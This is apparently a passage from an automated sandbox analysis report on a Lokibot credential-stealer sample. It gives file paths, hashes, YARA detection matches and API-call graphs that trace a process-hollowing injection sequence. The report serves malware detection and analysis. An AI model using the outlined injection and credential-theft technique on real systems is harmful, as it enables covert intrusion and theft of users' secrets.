                                              Path:C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"
                                              Imagebase:0x460000
                                              File size:705'032 bytes
                                              MD5 hash:4B905E6548F4D5040FAB8962CB71877E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:13
                                              Start time:04:57:08
                                              Start date:26/04/2024
                                              Path:C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"
                                              Imagebase:0xba0000
                                              File size:705'032 bytes
                                              MD5 hash:4B905E6548F4D5040FAB8962CB71877E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Loki_1, Description: Loki Payload, Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                              Reputation:low
                                              Has exited:true


                                                Execution Graph

                                                Execution Coverage:9.2%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:3.1%
                                                Total number of Nodes:96
                                                Total number of Limit Nodes:4
                                                APIs
                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 0772FA95
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: SectionUnmapView
                                                • String ID:
                                                • API String ID: 498011366-0
                                                • Opcode ID: 26fd7d3fe5a9e7be214addfdc0c629870d676b7befe573392bc59904d8ceaba8
                                                • Instruction ID: 4936c2732e75e067b8334c3fc782b04141401a03615a262a45862d41fa555158
                                                • Opcode Fuzzy Hash: 26fd7d3fe5a9e7be214addfdc0c629870d676b7befe573392bc59904d8ceaba8
                                                • Instruction Fuzzy Hash: 191149B29002598FCB20DFAAC8457DEFFF5EF89324F108829D459A7250CB35A945CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 0772FA95
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: SectionUnmapView
                                                • String ID:
                                                • API String ID: 498011366-0
                                                • Opcode ID: 78d64de751b5b041cc73358370518527faee0a3c784e1d0260db3ebd9a76f9e4
                                                • Instruction ID: 8fad4f682145816dddf72454cee555798031f3a8784cb45d183e557ce279ad33
                                                • Opcode Fuzzy Hash: 78d64de751b5b041cc73358370518527faee0a3c784e1d0260db3ebd9a76f9e4
                                                • Instruction Fuzzy Hash: 51113AB19002598FCB20DFAAC845BDEFFF5EF89324F208829D459A7250CB75A544CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 75f78a741a2b9701563e5100f75e097f981ece5b0213f9fc6185c827142ccd60
                                                • Instruction ID: 8f03eb2e6bf52fa46759dc3b4e482204ae3f225d49368908c298bbd10450298c
                                                • Opcode Fuzzy Hash: 75f78a741a2b9701563e5100f75e097f981ece5b0213f9fc6185c827142ccd60
                                                • Instruction Fuzzy Hash: E69158B0D15219DFCB48CFA5E58099DFBB2FF8A350F20A41AE426B7225DB309942DF14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 144ef4a7068d260ae49a4b654c359964134d98516e2b36f9245d93d6a2c37897
                                                • Instruction ID: dfaa09d2ea6fe434bf54d9a5da70b7dd8913c4ee643019e08d4dcc6cc656ebca
                                                • Opcode Fuzzy Hash: 144ef4a7068d260ae49a4b654c359964134d98516e2b36f9245d93d6a2c37897
                                                • Instruction Fuzzy Hash: 6D9137B0E15219DFCB48CFA5E58099DFBB2FF89350F20A41AE426B7225DB349906DF14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 273a1687e873874657d9a54fbbfbb0aabecaa881144d66d4ad0ef9a26b68e186
                                                • Instruction ID: 207a267a901d585f950ccd35dda450c7c152337fcc3b66daeeb86c468dd0e1ef
                                                • Opcode Fuzzy Hash: 273a1687e873874657d9a54fbbfbb0aabecaa881144d66d4ad0ef9a26b68e186
                                                • Instruction Fuzzy Hash: A08122B4E14229CFCF04CFA9C9819AEFBB1FB89340F10A95AE511B7215D7349942DF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ffb9a7bcfed161e4b6886041901b656775dce621f983a41c1b618bcc4af445cc
                                                • Instruction ID: 7bfda873a9f80b8c95fd9268c1a64baf816bf63ff99ae0bebf22bedfcb0d61ca
                                                • Opcode Fuzzy Hash: ffb9a7bcfed161e4b6886041901b656775dce621f983a41c1b618bcc4af445cc
                                                • Instruction Fuzzy Hash: 6A8123B4E14229DFCF14CFA9C9819EEFBB2FB89340F00A95AE511A7215D7389902DF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                [control-flow graph figure, legend Executed / Not Executed: basic blocks fad378-fad545, calling GetCurrentProcess, GetCurrentThread, GetCurrentProcess and GetCurrentThreadId]
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 00FAD3F6
                                                • GetCurrentThread.KERNEL32 ref: 00FAD433
                                                • GetCurrentProcess.KERNEL32 ref: 00FAD470
                                                • GetCurrentThreadId.KERNEL32 ref: 00FAD4C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1733610804.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fa0000_gunzipped.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 0f914a1ee6edf7cf5a8ff285a4e30528c561ae19921b5f782447b4c3ff80d25a
                                                • Instruction ID: 0e6dd4ca95c7d09a6ddb5aa24ee7aa2c3d07a2ab2b43cb792852e59a91d53a0b
                                                • Opcode Fuzzy Hash: 0f914a1ee6edf7cf5a8ff285a4e30528c561ae19921b5f782447b4c3ff80d25a
                                                • Instruction Fuzzy Hash: F45155B0D002498FDB14DFA9D548B9EBBF1AF48314F20C559E419A7360DB74A988CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                [control-flow graph figure, legend Executed / Not Executed: basic blocks 52e4fa8-52e525e, with internal calls to 52e4324 and 52e4330]
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Hbq$Hbq
                                                • API String ID: 0-4258043069
                                                • Opcode ID: 422f5d8d104cddec162aab2faeb52ceed0b470a89aacb3d4cf650e0c0de564c5
                                                • Instruction ID: 8ad64ed2767ccb8574d388b9e849c70fcd1a48a0af6a2a6bf3a40bee0f38b0ab
                                                • Opcode Fuzzy Hash: 422f5d8d104cddec162aab2faeb52ceed0b470a89aacb3d4cf650e0c0de564c5
                                                • Instruction Fuzzy Hash: 01818C70E103198FCB04DFA9C8946AEBBF2FF88300F64852AE409EB354DB749901CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                [control-flow graph figure, legend Executed / Not Executed: basic blocks 52e4b78-52e5bea, with internal calls to 52e4b34, 52e4b58, 52e4b68, 52e4cdc, 52e4cec and 52e4cfc]
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (bq$Hbq
                                                • API String ID: 0-4081012451
                                                • Opcode ID: dbeb58df89beb998613f03fea737524ce839878482f4b21b8024179fb2baea1d
                                                • Instruction ID: e5f6eb872e787a130f76f9cbb6d82da701be8cf646ef072189249a63d96a1114
                                                • Opcode Fuzzy Hash: dbeb58df89beb998613f03fea737524ce839878482f4b21b8024179fb2baea1d
                                                • Instruction Fuzzy Hash: 8051E371B202198FCB14EFA8C88966F7FE6FF84310B108969E40697394DE34CD158B95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                [control-flow graph figure, legend Executed / Not Executed: basic blocks 52e06e8-52e0962, with internal calls to 52e1214 and 52e1220]
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $
                                                • API String ID: 0-227171996
                                                • Opcode ID: 66963b633425a4ae40bcf2098ed883fe0910a9e23bd75d5c18c38de60a441e4c
                                                • Instruction ID: 5851380bc39e70ab81bb19101ee75480cdfb631a278acf938d76d835ac8e2a00
                                                • Opcode Fuzzy Hash: 66963b633425a4ae40bcf2098ed883fe0910a9e23bd75d5c18c38de60a441e4c
                                                • Instruction Fuzzy Hash: F971C435910701CFDB10EF28E489659B7B2FF95314B4586A9D849AB31AEFB1F984CF80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                [control-flow graph figure, legend Executed / Not Executed: basic blocks 52e06f8-52e0962, with internal calls to 52e1214 and 52e1220]
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $
                                                • API String ID: 0-227171996
                                                • Opcode ID: 5ebc165764e01f9e5e4ae20b28fe78509fca236c6c3415a4a2806ac8406b4a77
                                                • Instruction ID: 5e8ea16a1a8dfd09fe74e63333854182dbab8f35438f505131841c23c9dd6b23
                                                • Opcode Fuzzy Hash: 5ebc165764e01f9e5e4ae20b28fe78509fca236c6c3415a4a2806ac8406b4a77
                                                • Instruction Fuzzy Hash: 0761B635910701CFDB10EF28E489659B7B2FF95314B4186A9D949AB31AEFB1F984CF80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                [control-flow graph figure, legend Executed / Not Executed: basic blocks 772fadd-772fe2d, calling CreateProcessA]
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0772FD1E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: edd9d51724bace08a1b547e69e88d1e1210d66904da5a2363ac75ad649236eae
                                                • Instruction ID: 8088ef96617e0ffbb9467cfb1bf86088a7046d7c2a7f70c79ab7ce5031f8d413
                                                • Opcode Fuzzy Hash: edd9d51724bace08a1b547e69e88d1e1210d66904da5a2363ac75ad649236eae
                                                • Instruction Fuzzy Hash: 82A1ADB1D00229DFDB10CF68C851BEDBBB2FF48350F1485A9E818A7250DB749982DF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                [control-flow graph figure, legend Executed / Not Executed: basic blocks 772fae8-772fe2d, calling CreateProcessA]
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0772FD1E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 8384d39f13679a1e1b38fda8a4e6cd600fa469253c171564e6b5d91d8d95e5f0
                                                • Instruction ID: 9220aa538bce3c78b0ddcf89da1017bdfbef06ffad4beb51771060a649a74eec
                                                • Opcode Fuzzy Hash: 8384d39f13679a1e1b38fda8a4e6cd600fa469253c171564e6b5d91d8d95e5f0
                                                • Instruction Fuzzy Hash: D5918EB1D00229DFDB14CF68C851BEDBBB2FF48350F1485A9E818A7250DB749986DF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                [control-flow graph figure, legend Executed / Not Executed: basic blocks faace8-faaf68, with internal calls to faa040, faa04c, faa05c, faa06c, faa07c, faaf7b and faaf80, and a call to GetModuleHandleW]
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00FAAF3E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1733610804.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fa0000_gunzipped.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 053b6c7cdf90d7669d82887a9bf183d7944af72894a3ab70eb6d1f66154ecf19
                                                • Instruction ID: 73493e83f26c24ce96b90fc093f7ff4fb6247eafeec71d5579619da5c6472a3c
                                                • Opcode Fuzzy Hash: 053b6c7cdf90d7669d82887a9bf183d7944af72894a3ab70eb6d1f66154ecf19
                                                • Instruction Fuzzy Hash: 038165B0A00B058FD724DF29D44575ABBF1FF89314F008A2DD08ADBA50D739E94ADB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                [control-flow graph figure, legend Executed / Not Executed: basic blocks fa44e4-fa5a41, calling CreateActCtxA]
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 00FA59A9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1733610804.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fa0000_gunzipped.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: f0bc64aa47e3e772c03130ac09c57a169690896fe385fe87c0905523bb99d26f
                                                • Instruction ID: 7240c8ee104ed9f4f843ee7dc2741cf444d51726dd2b7aa0b58f391d0d660d1c
                                                • Opcode Fuzzy Hash: f0bc64aa47e3e772c03130ac09c57a169690896fe385fe87c0905523bb99d26f
                                                • Instruction Fuzzy Hash: 8741F2B0D0071DCFDB24DFA9C884B8EBBB9BF49704F20816AD408AB251DB756949CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                [control-flow graph figure, legend Executed / Not Executed: basic blocks fa58f3-fa5a41, calling CreateActCtxA]
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 00FA59A9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1733610804.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fa0000_gunzipped.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 411401ea26a3a363ed98725144dabf907c7107ed76c253781e94d06872e36951
                                                • Instruction ID: bce31f1b0a2b4cc2ab583c868c6d1605011a836e7b7f0a3382f95082ce64b725
                                                • Opcode Fuzzy Hash: 411401ea26a3a363ed98725144dabf907c7107ed76c253781e94d06872e36951
                                                • Instruction Fuzzy Hash: 484103B0D00729CFDB24CFA9C884BDEBBB5BF49304F24816AD448AB251DB75594ACF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                [control-flow graph figure, legend Executed / Not Executed: basic blocks 772f859-772f936, calling WriteProcessMemory]
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0772F8F0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 599cda1e2c56514d661c68a761a614c4b50d5d4472ae2774f997bba4fe35a89f
                                                • Instruction ID: 6f436b225d4b7d44e5b338d0b6569157b8b1b661f9c07b87c5312a324eb1228a
                                                • Opcode Fuzzy Hash: 599cda1e2c56514d661c68a761a614c4b50d5d4472ae2774f997bba4fe35a89f
                                                • Instruction Fuzzy Hash: 3F2148B29003599FCB10DFA9C885BEEBBF5FF48350F10842AE958A7250C7749554DBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                [control-flow graph figure, legend Executed / Not Executed: basic blocks 772f860-772f936, calling WriteProcessMemory]
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0772F8F0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 141acf708e92717cd80b0add94df15d294feb952eaabbaf1cf8d4d3bb36c2439
                                                • Instruction ID: 8b99fa1739514d314fe62601219cef806a6d4af6c258858428812b5353ba29f6
                                                • Opcode Fuzzy Hash: 141acf708e92717cd80b0add94df15d294feb952eaabbaf1cf8d4d3bb36c2439
                                                • Instruction Fuzzy Hash: 972127B29003599FCB10DFA9C885BDEBBF5FF48310F108429E959A7250C7789954DBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0772F9D0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 8773771eb6fd9657538ef261303ea35ebf9e36ff3f7095e32b2cd81514e883dc
                                                • Instruction ID: d82f4a51ec7b8e960240f508bf9234afcdc0e0610e7774e0324467fd36a2f2ec
                                                • Opcode Fuzzy Hash: 8773771eb6fd9657538ef261303ea35ebf9e36ff3f7095e32b2cd81514e883dc
                                                • Instruction Fuzzy Hash: 202148B19002599FCB10DFAAC885BEEFBF5FF48320F10842AE558A7250C7389945CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0772F746
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 8e6fd76101e58c9a44c0120037bf4b46d672401f6a08f99eab4e54ddbb395b9b
                                                • Instruction ID: fb859d0a8a70e0ac435c0054d36134d3eb538ec81405cc64847045b429661dce
                                                • Opcode Fuzzy Hash: 8e6fd76101e58c9a44c0120037bf4b46d672401f6a08f99eab4e54ddbb395b9b
                                                • Instruction Fuzzy Hash: A0216AB19002198FDB10DFAAC4857EEBBF4EF48324F508429D459A7340C7789985CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0772F746
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0772F9D0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FAD647
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1733610804.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fa0000_gunzipped.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0772F80E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00FAAFB9,00000800,00000000,00000000), ref: 00FAB1CA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1733610804.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fa0000_gunzipped.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00FAAFB9,00000800,00000000,00000000), ref: 00FAB1CA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1733610804.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fa0000_gunzipped.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0772F80E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00FAAF3E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1733610804.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fa0000_gunzipped.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Hbq
                                                • API String ID: 0-1245868
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: F#Y
                                                • API String ID: 0-659076689
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
